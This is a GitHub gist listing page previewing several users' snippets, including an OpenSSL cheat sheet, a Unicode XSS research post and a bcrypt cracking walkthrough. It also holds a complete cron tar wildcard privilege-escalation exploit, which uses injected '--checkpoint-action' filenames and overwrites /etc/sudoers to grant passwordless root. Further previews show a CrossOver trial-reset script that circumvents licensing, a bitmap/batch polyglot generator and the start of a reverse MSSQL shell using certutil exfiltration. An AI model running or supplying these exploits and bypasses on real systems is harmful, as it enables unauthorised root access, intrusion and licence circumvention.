Skip to content

Instantly share code, notes, and snippets.

View santaklouse's full-sized avatar

Alex santaklouse

28 followers · 29 following
View GitHub Profile
@paj28
paj28 / index.md
Last active April 18, 2025 12:49

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@Roni-Carta
Roni-Carta / wp-wordlist.sh
Created July 29, 2022 19:52
wp-wordlist helps you create wordlist of all the Wordpress' Themes and Plugins available
wp-wordlist()
{
option="$1"
if [[ "$option" == *"plugin"* ]]; then
curl -s https://plugins.svn.wordpress.org/ | tail -n +5 | sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' | grep -v "Powered by Apache" | sort -u
elif [[ "$option" == *"theme"* ]]; then
curl -s https://themes.svn.wordpress.org/ | tail -n +5 | sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' | grep -v "Powered by Apache" | sort -u
fi
}
@wrongbyte
wrongbyte / bcrypt.md
Last active December 19, 2024 03:10
Cracking a hashed password

Cracking a hashed password

Given a hashed password $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom, we have only one hint: the password has four letters, all lowercase.

Let's start: finding the hash type

There are a lot of hashes out there. A good way to start is to look at the hashed pass and try to find some kind of pattern. Here, the key is the first 4 characters of the hash. There is a page where you can look at example hashes: https://hashcat.net/wiki/doku.php?id=example_hashes Noticed something? We are looking for the bcrypt $2*$, Blowfish (Unix). Our $2y$ matches this pattern. So we are looking for a bcrypt hash. We also can grasp that the hash was generated using a factor of 12 (it is the number that comes after the first four characters).

Let's crack!

First, it is important to know how the proccess works. Hashing is a process essentially different from encryption - you can only do it once. It means that we cannot really recover the plaintext of a hashed

@santaklouse
santaklouse / CrossOver.sh
Last active April 25, 2025 16:23
unlimited CrossOver trial (MacOS)
#!/usr/bin/env bash
# checck if pidof exists
PIDOF="$(which pidof)"
# and if not - install it
(test "${PIDOF}" && test -f "${PIDOF}") || brew install pidof
# find app in default paths
CO_PWD=~/Applications/CrossOver.app/Contents/MacOS
test -d "${CO_PWD}" || CO_PWD=/Applications/CrossOver.app/Contents/MacOS
@Hakky54
Hakky54 / openssl_commands.md
Last active April 25, 2025 10:21 — forked from p3t3r67x0/openssl_commands.md
OpenSSL Cheat Sheet

OpenSSL Cheat Sheet 🔐

Install

Install the OpenSSL on Debian based systems

sudo apt-get install openssl
@noize-e
noize-e / firewall.sh
Created May 29, 2019 06:48
macOS socketfilterfw firewall decorator
#!/usr/bin/env bash
set -o errexit
set -o errtrace
usage() {
printf "\
macOS socketfilterfw decorator.
firewall [-command] [args]
@CaptBoykin
CaptBoykin / linux_privesc_cron_tar_wildcard.txt
Last active October 10, 2022 10:09
Cron Tar Wildcard Injection (Linux Privesc)
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
@FrankSpierings
FrankSpierings / bitchmap.py
Last active June 4, 2019 10:01
Create a bitmap file which can be used as a cmd/batch file
#!/usr/bin/python3
#
#Based on: https://www.thelacunablog.com/open-command-prompt-ms-paint.html
import struct
from PIL import Image
def imagegen(s, path):
# Fix header
s = '\x00\x00\x0a\x0d\x0a\x0d' + s
@amit-chahar
amit-chahar / download-script.sh
Last active February 20, 2023 12:57
Scirpt to download files from Google drive using curl (Detailed explanation can be read here: https://stackoverflow.com/a/49444877/4043524)
#!/bin/bash
fileid="FILEIDENTIFIER"
filename="FILENAME"
curl -c ./cookie -s -L "https://drive.google.com/uc?export=download&id=${fileid}" > /dev/null
curl -Lb ./cookie "https://drive.google.com/uc?export=download&confirm=`awk '/download/ {print $NF}' ./cookie`&id=${fileid}" -o ${filename}
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''